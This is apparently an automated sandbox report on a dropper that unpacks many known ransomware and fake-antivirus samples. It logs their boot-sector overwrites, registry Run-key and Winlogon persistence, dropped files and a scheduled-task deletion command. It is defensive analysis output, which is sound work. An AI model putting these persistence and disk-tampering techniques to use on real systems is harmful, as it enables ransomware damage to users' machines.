        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_01
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeAutomated click: Continue
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeAutomated click: OK
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: 4W5dQXszUV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: 4W5dQXszUV.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: msi.pdb source: shi2B2E.tmp.53.dr
        Source: Binary string: criticalupdate01.pdb source: Fantom.exe, 0000000D.00000003.345964269.000000000077E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: F:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\UI\UI\obj\Debug\UI.pdb source: Endermanch@InfinityCrypt.exe, 0000001A.00000000.346284169.0000000000723000.00000002.00000001.01000000.00000010.sdmp, Endermanch@InfinityCrypt.exe.0.dr
        Source: Binary string: F:\DESKTOP!\ChkDsk\ChkDsk\obj\Debug\PremiereCrack.pdb source: Endermanch@InfinityCrypt.exe, 0000001A.00000000.346769311.0000000000742000.00000002.00000001.01000000.00000010.sdmp, Endermanch@InfinityCrypt.exe.0.dr
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\AICustAct.pdb source: Error file remover.msi.53.dr
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\aischeduler.pdb source: Error file remover.msi.53.dr
        Source: Binary string: _.pdb source: Fantom.exe, 0000000D.00000003.345964269.000000000077E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\stubs\x86\ExternalUi.pdb source: Endermanch@WinlockerVB6Blacksod.exe, 00000035.00000000.408083341.000000000136E000.00000002.00000001.01000000.00000017.sdmp
        Source: Binary string: GoogleCrashHandler_unsigned.pdb} source: Endermanch@Petya.A.exe, 0000002C.00000002.565359831.0000000000428000.00000002.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002C.00000000.370245483.0000000000428000.00000002.00000001.01000000.00000015.sdmp
        Source: Binary string: msi.pdbUGP source: shi2B2E.tmp.53.dr
        Source: Binary string: GoogleCrashHandler_unsigned.pdb source: Endermanch@Petya.A.exe, 0000002C.00000002.565359831.0000000000428000.00000002.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002C.00000000.370245483.0000000000428000.00000002.00000001.01000000.00000015.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\aischeduler2.pdb source: Error file remover.msi.53.dr
        Source: Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 0000000B.00000000.335502869.0000000000512000.00000002.00000001.01000000.0000000C.sdmp
        Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000004.00000003.347913498.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.329448544.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363121457.000000000335A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342307244.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.330844092.0000000003363000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\stubs\x86\ExternalUi.pdbL source: Endermanch@WinlockerVB6Blacksod.exe, 00000035.00000000.408083341.000000000136E000.00000002.00000001.01000000.00000017.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\AICustAct.pdb,0 source: Error file remover.msi.53.dr

        Data Obfuscation

        barindex
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeUnpacked PE file: 5.2.Endermanch@Cerber5.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeUnpacked PE file: 5.2.Endermanch@Cerber5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0041714C push 00417178h; ret 3_2_00417170
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0040E108 push ecx; mov dword ptr [esp], edx3_2_0040E10D
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0040F12C push 0040F158h; ret 3_2_0040F150
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00417184 push 004171AAh; ret 3_2_004171A2
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_004053E0 push 00405431h; ret 3_2_00405429
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0040E49E push 0040E8ECh; ret 3_2_0040E8E4
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_004135E0 push ecx; mov dword ptr [esp], ecx3_2_004135E5
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0040059D push es; ret 3_2_004005C9
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00405648 push 00405674h; ret 3_2_0040566C
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00407668 push dword ptr [eax+6Ch]; ret 3_2_0040766B
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0040766C push dword ptr [eax+6Ch]; ret 3_2_004076A0
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00405610 push 0040563Ch; ret 3_2_00405634
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0040E770 push 0040E8ECh; ret 3_2_0040E8E4
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_004087B4 push 0040880Ah; ret 3_2_00408802
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00411858 push 004118CEh; ret 3_2_004118C6
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00406808 push dword ptr [edx+04h]; ret 3_2_00406817
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0040880C push 00408839h; ret 3_2_00408831
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0040883C push 00408B38h; ret 3_2_00408B30
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_004118D0 push 00411978h; ret 3_2_00411970
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0040E8EE push 0040E95Fh; ret 3_2_0040E957
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0040E8F0 push 0040E95Fh; ret 3_2_0040E957
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0041197A push 00411A20h; ret 3_2_00411A18
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_004059D0 push 004059FCh; ret 3_2_004059F4
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_004119F4 push 00411A20h; ret 3_2_00411A18
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00405996 push 004059C4h; ret 3_2_004059BC
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00405998 push 004059C4h; ret 3_2_004059BC
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00411A57 push 00411AA5h; ret 3_2_00411A9D
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00411A58 push 00411AA5h; ret 3_2_00411A9D
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00405A08 push 00405A34h; ret 3_2_00405A2C
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00402ACC push eax; ret 3_2_00402B08
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00411AA9 push 00411ADCh; ret 3_2_00411AD4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A49016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,4_2_04A49016
        Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: section name: .data2
        Source: Endermanch@WannaCrypt0r.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x363012
        Source: Endermanch@HappyAntivirus.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1ed7f7
        Source: Endermanch@PolyRansom.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x4214c
        Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xcfabb
        Source: wKAwMsck.exe.47.drStatic PE information: real checksum: 0x0 should be: 0x3decf
        Source: Endermanch@DeriaLock.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x82848
        Source: Endermanch@Xyeta.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x18075
        Source: Endermanch@AntivirusPlatinum.exe.0.drStatic PE information: real checksum: 0x21337 should be: 0xc4420
        Source: Endermanch@ViraLock.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3a0f8
        Source: csrss.exe.38.drStatic PE information: real checksum: 0x0 should be: 0x1624e8
        Source: Endermanch@WinlockerVB6Blacksod.exe.0.drStatic PE information: real checksum: 0x1676f6 should be: 0x26f735
        Source: Endermanch@NoMoreRansom.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1624e8
        Source: rCUUIQEQ.exe.47.drStatic PE information: real checksum: 0x0 should be: 0x33557
        Source: Endermanch@Krotten.exe.0.drStatic PE information: real checksum: 0x13aae should be: 0xee00
        Source: WindowsUpdate.exe.13.drStatic PE information: real checksum: 0x0 should be: 0xf22f
        Source: Endermanch@Antivirus.exe.0.drStatic PE information: real checksum: 0x200061 should be: 0x206fc7
        Source: 4W5dQXszUV.exeStatic PE information: real checksum: 0x0 should be: 0x2549d
        Source: Endermanch@InfinityCrypt.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3cd67
        Source: Endermanch@Birele.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22594
        Source: fatalerror.exe.53.drStatic PE information: real checksum: 0x143a2 should be: 0xc6ee
        Source: Fantom.exe.0.drStatic PE information: real checksum: 0x23bfb should be: 0x42811
        Source: Endermanch@AnViPC2009.exe.0.drStatic PE information: real checksum: 0x236e4 should be: 0x12f8ba
        Source: initial sampleStatic PE information: section name: .text entropy: 7.963294302792805
        Source: initial sampleStatic PE information: section name: .text entropy: 7.3467930766155956
        Source: initial sampleStatic PE information: section name: .text entropy: 7.193641199482148
        Source: initial sampleStatic PE information: section name: .text entropy: 7.995168937044817
        Source: initial sampleStatic PE information: section name: .text entropy: 7.848405878864468
        Source: initial sampleStatic PE information: section name: .text entropy: 6.9446307309914985
        Source: initial sampleStatic PE information: section name: .text entropy: 7.3467930766155956
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 8192 length: 8192
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: reg.exe
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: reg.exe
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: reg.exe
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: reg.exe
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: reg.exe
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: reg.exe
        Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\Windows\DCD7.tmpJump to behavior
        Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\dispci.exe
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeFile created: C:\ProgramData\Windows\csrss.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeFile created: C:\ProgramData\Windows\csrss.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeFile created: C:\ProgramData\sWAsokQQ\wKAwMsck.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\qfvdb0vr.1x3\Endermanch@Antivirus.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\etnjaaha.pdu\Endermanch@Xyeta.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeFile created: C:\ProgramData\Windows\csrss.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\u1k33a3l.310\Endermanch@HappyAntivirus.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeFile created: C:\Users\user\AppData\Local\Temp\WindowsUpdate.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exeFile created: C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\decoder.dllJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\iptzuyxi.lvf\Endermanch@FakeAdwCleaner.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exeFile created: C:\Users\user\AppData\Local\Temp\shi2B2E.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeFile created: C:\ProgramData\sWAsokQQ\wKAwMsck.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exeFile created: C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\fatalerror.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\kql13vqd.ufc\Endermanch@AntivirusPlatinum.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeFile created: C:\Users\user\yeYUggIg\rCUUIQEQ.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\y5f2j2j3.yr4\Endermanch@AntivirusPro2017.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\ihramkff.aqi\Endermanch@ViraLock.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\h21abmmw.gcd\Endermanch@AnViPC2009.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exeJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exeJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run rCUUIQEQ.exe
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run systemJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\LanmanServer\Parameters
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run systemJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run systemJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run rCUUIQEQ.exe
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run rCUUIQEQ.exe
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A49534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,4_2_04A49534

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00416FDD RegisterHotKey 00000000,00000001,00000001,00000009,00000000,windowssecurity3_2_00416FDD
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Start_ShowRun
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer NoDesktop
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
